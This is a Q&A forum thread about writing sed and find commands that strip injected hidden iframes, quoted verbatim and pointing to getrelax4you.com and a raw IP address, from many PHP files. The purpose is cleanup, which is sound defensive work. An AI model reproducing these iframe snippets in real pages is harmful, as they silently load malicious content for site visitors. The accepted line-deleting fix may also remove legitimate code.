# Single Quotes Iframe Virus

Tags: shell, iframe

i am looking for a shell script to remove following code from multiple files:

```
<iframe hbfww='BoGJMTtZ' src='http://getrelax4you.com/in.cgi?7 ' width='665' height='432' style='display:none'></iframe>
```

I found scripts to remove iframes but they alle where for code with double quotes

Like this one here:

```
find -name "*.php" -exec sed -i 's/<iframe src="http:\/\/124.217.252.62\/~admin\/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//' {} \;
```

i tried escaping the single quotes like this

```
find -name "*.php" -exec sed -i 's/<iframe src=\'http:\/\/getrelax4you\/in.cgi?7 \' width=\'665\' height=\'432\' style=\'display:none\'><\/iframe>//' {} \;
```

but then i get --> syntax error near unexpected token `<'

Answer (score 1):

```
cat xyz.php | sed "s/.*BoG.*$//g" > fixedxyz.php
```

replace the BoG with as much as is necessary to make it unique (the '<' is irrelevant in my search/replace)

Comment: this seems to do the trick, thank you. my final code is:

find -name "*.php" -exec sed -i "s/.*getrelax.*$//g" {} \;

Comment: yes, I saw your line after my entry - figured you'd be OK with my form :)  Don't forget to upvote/accept....

Comment: Though you have a competing answer, I'll do some upvoting for you.

Comment: Thanks - I just like giving an example that matches in the short pattern - makes understanding the process much easier when you find this happening again in 3 months :)

Comment: And, it would have been better if I had chosen 'getrelax4you' as my constant in the regex (for clarity reasons)

Comment: May I ask why you didn't do `sed "s/.*BoG.*$//g" < xyz.php > fixedxyz.php`? To show how you could pipe input into `sed`? Or wouldn't this work at all?

Comment: It's a style thing - I think it makes it clearer to a neophyte when they look at the format I used (it 'reads' left to right).  Both are correct though.

Answer (score 0):

You might need to escape the `<` using a backslash: `\<` (or `\\<`, to escape the escape char from the shell)

Comment: i tried both but it doesnt really work, can you post a full command?

Answer (score 0):

Strange, but double quotes on the outside work for me:

```
find -name "*.php" -exec sed -i "s/<iframe src=\'http:\/\/getrelax4you\/in.cgi?7 \' width=\'665\' height=\'432\' style=\'display:none\'><\/iframe>//" {} \;
```

But I cannot stop wondering why your command doesn't work. I tried this on bash.

Comment: hm it runs, but has no affect on my files.

Comment: OK, how about removing some backslashes? Like the ones that escape the `'` single quotes? Shell quoting is complicated.

Answer (score 0):

This should work without any escaping:

```
sed "s|<iframe hbfww='BoGJMTtZ' src='http://getrelax4you.com/in.cgi?7 ' width='665' height='432' style='display:none'></iframe>||"
```